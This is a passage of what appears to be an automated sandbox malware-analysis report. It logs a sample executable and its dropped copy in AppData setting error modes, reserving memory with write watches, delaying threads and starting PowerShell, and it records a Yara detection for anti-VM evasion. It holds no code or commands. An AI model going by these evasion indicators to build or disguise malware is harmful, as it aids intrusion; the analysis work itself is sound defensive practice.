                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 6360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7260, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 1100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 7910000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 8910000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 8AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 9AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 9E20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: AE20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: BE20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 1470000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeMemory allocated: 2E60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 1730000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 1750000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 7580000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 8580000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 8700000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 9700000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 9E00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: AE00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 1140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 2B80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeMemory allocated: 2AD0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599326Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598323Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597981Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597873Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597765Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597656Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597546Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597218Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596343Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595902Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595671Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595231Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 594671Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599885
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599656
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599547
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599328
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599109
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 599000
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598890
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598781
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598671
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598562
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598453
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598343
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598234
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598124
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 598015
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597906
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597797
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597687
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597578
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597468
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597359
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597250
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597140
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 597031
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596921
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596812
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596703
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596581
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596453
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596343
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596229
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 596109
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595997
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595852
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595728
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeThread delayed: delay time: 595609
